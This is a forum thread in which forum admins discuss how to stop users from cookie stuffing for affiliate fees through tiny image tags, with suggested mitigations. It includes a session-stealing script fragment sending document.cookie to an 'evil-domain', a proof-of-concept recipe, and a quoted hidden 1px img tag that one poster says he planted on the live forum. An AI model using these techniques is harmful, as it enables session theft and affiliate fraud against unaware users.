Cookie Stuffing - how to avoid it. January 24, 2018, 04:35:37 pm How can we avoid that users are posting 1x1 pixel wide http links instead of images,so that they are not cookie stuffing the forum ?Cookie Stuffing works this way, that normal http links are posted inside an Image tagso the browser calls up this link and fetches the Cookie from the destination site andthen no image is displayed and thus they make it only 1 x 1 pixel big, so that it does notlook suspicious...How can this be stopped, also in [img] tag and in avatars loaded from external sites ?Many thanks.
Re: something Reply #1 – January 24, 2018, 06:02:10 pm How can we avoid that users hijack each and every topic?
Re: Cookie Stuffing - how to avoid it. Reply #2 – January 30, 2018, 03:52:51 pm Never but .. 2fa login/register helps a little bit Fel
Re: Cookie Stuffing - how to avoid it. Reply #3 – January 30, 2018, 03:55:40 pm Quote from: hartiberlin – January 24, 2018, 04:35:37 pmCookie Stuffing works this way, that normal http links are posted inside an Image tag ...Step 1 .. use httpsStep 2 .. set cookies to secure and httpsStep 3 .. use 2FA login / registerThat will helps a little bit
Re: Cookie Stuffing - how to avoid it. Reply #4 – February 01, 2018, 02:15:19 pm Hmm, how does the 2 Factor Authentication can stop this ?This is only for the login of the member, but he could still be postinghttp links inside an image [img] tag, right ?
Re: Cookie Stuffing - how to avoid it. Reply #5 – February 01, 2018, 05:11:10 pm I may be terribly wrong, but as far as I know, unless a bug in the browser, an embedded image cannot sniff the cookies because they reside on two different domains and cookies are domain specific.You need at least to be able to run javascript to sniff the session data, embedded images are generally not enough from what I know.
Re: Cookie Stuffing - how to avoid it. Reply #6 – February 02, 2018, 09:30:54 pm Also you can disable images in the posts .. (simple disable the BBC img tag in the settings).If a user will add a image, he can upload it and insert this as attach. So this image is local stored.
Re: Cookie Stuffing - how to avoid it. Reply #7 – February 02, 2018, 09:34:17 pm Quote from: hartiberlin – February 01, 2018, 02:15:19 pmHmm, how does the 2 Factor Authentication can stop this ?That do not stops any criminal activity .. but .. I think, that such users do not have a accout they can handle 2FA
Re: Cookie Stuffing - how to avoid it. Reply #8 – February 05, 2018, 07:14:21 am One way could be to use the Image Cache/Proxy https://www.elkarte.net/community/index.php?topic=3432.msg32243#msg32243
Re: Cookie Stuffing - how to avoid it. Reply #9 – February 05, 2018, 04:30:51 pm You meam a way to mitigate a problem that doesn't exist, or you mean the cache proxy could be exploited to send cookie data back?
Re: Cookie Stuffing - how to avoid it. Reply #10 – February 07, 2018, 10:50:58 am Cookies can only be set and read on the domain the browser retrieves data from. The OP is clearly talking about preventing third-party tracking cookies (hence "stuffing," not "sniffing"), which as a problem is perfectly possible in a regular bog-standard HTTP environment. I hadn't encountered the specific term before, but Wikipedia explains it thus:QuoteOn the World Wide Web, cookie stuffing (also cookie dropping) is an affiliate marketing technique in which, as a result of visiting a website, a user receives a third-party cookie from a website unrelated to that visited by the user, usually without the user being aware of it. If the user later visits the target website and completes a qualifying transaction (such as making a purchase), the cookie stuffer is paid a commission by the target.I don't know if this is actually something to worry about, but all you have to do to test it is to copy the php setcookie() example into a PHP file, stick <img src="the-different-domain-with-setcookie.php"> in an HTML file, load it, and check if the cookie exists on the-different-domain. Unless you've disabled third-party cookies, it will.You're talking about something like XSS session hijacking, which is completely unrelated except in the sense that you could use image.src = evil-domain + document.cookie in a script to do it. To prevent that in case of script injection, use HttpOnly, preferably combined with HTTPS. But like I said, that's off topic. This is about tracking cookies.Edit: Quoting what I wrote above:QuoteUnless you've disabled third-party cookies, it will.Of course you'll need to add an image mimetype and some image data if you want to display an actual 1x1 px image as opposed to a nice broken image icon. Presumably a transparent GIF would be your best bet. My point was that you can perform the basic proof of concept in seconds.Edit 2: fully worked out example here, including a full description of the problem (described as an opportunity). Of course not everything applies because our forum won't request resources other than the one specific image from the server:Quote Once the third-party cookie system is in place, it can be made to do something useful. For example:When the third-party cookie is set any content can be sent to the web page with appropriate HTML tags. Image, JavaScript, Flash, HTML ads, anything that can be published on a web page. [The ad thing might apply, but in that case the actual ads would already be doing the tracking cookie job in the first place.]The cookie setting can be logged, along with any other information available at the time, including referring web page and domain, and including any other information the HTML tag provided. [This obviously applies.]Date and time can be recorded. Ad identification can be recorded. [Sure.]Cookies previously set can be read and the cookie's value adjusted. [Yup.]There are ways to work around third-party cookie restrictions some browsers make available to their users. [Not without participation from both domains.]The limit of what can be done may be determined by the limit of what can be imagined. [Not to worry about that one; again not without participation from all domains involved.]
Re: Cookie Stuffing - how to avoid it. Reply #11 – February 12, 2018, 10:58:13 am Quote from: Frenzie – February 07, 2018, 10:50:58 amCookies can only be set and read on the domain the browser retrieves data from. The OP is clearly talking about preventing third-party tracking cookies (hence "stuffing," not "sniffing"), which as a problem is perfectly possible in a regular bog-standard HTTP environment. I hadn't encountered the specific term before, but Wikipedia explains it thus:QuoteOn the World Wide Web, cookie stuffing (also cookie dropping) is an affiliate marketing technique in which, as a result of visiting a website, a user receives a third-party cookie from a website unrelated to that visited by the user, usually without the user being aware of it. If the user later visits the target website and completes a qualifying transaction (such as making a purchase), the cookie stuffer is paid a commission by the target.Yes, I meant this regarding affiliate cookies stuffing, e.g. Amzon or Ebay or Clickbank cookies for instance...Hiding them in an Image Tag can set them in the userĀ“s browser although he never visited Amazon for instance..Then when he visits himself Amazon and makes a purchase, the Cookie Stuffer gets the commission for the sale...I want to prevent this being done by users in my forum.Many thanks.Regards, Stefan.
Re: Cookie Stuffing - how to avoid it. Reply #12 – February 17, 2018, 03:13:53 am Sorry, I thought it was a typo.You get pretty nasty users there.Disable any embedding and you are safe.Enable https and image cache and you should be safe.
Re: Cookie Stuffing - how to avoid it. Reply #13 – June 01, 2018, 11:51:06 am Well Elkarte.net is also vulnerable to cookie stuffing.I just tested it and it went through.See:https://www.elkarte.net/community/index.php?topic=5272.msg37525#msg37525Mark all the text there in this posting and rightlick in Firefoxand click "Show Sourcecode of marked selection."There you wil see the img src tag with a https link just to google.deand nobody knows, that it is there...This way you can also set Affiliate cookies without anybody knowing...So the admins here should better deactivate this function on Elkarte.net !
Re: Cookie Stuffing - how to avoid it. Reply #14 – June 01, 2018, 11:54:41 am Code: [Select]<img src="https://google.de" alt="" style="width: 100%; max-width: 20px; max-height: 1px; cursor: pointer;" class="bbc_img resized">The mentioned posting https://www.elkarte.net/community/index.php?topic=5272.msg37525#msg37525now contains this and this way a Cookie from Google will be set into your browser...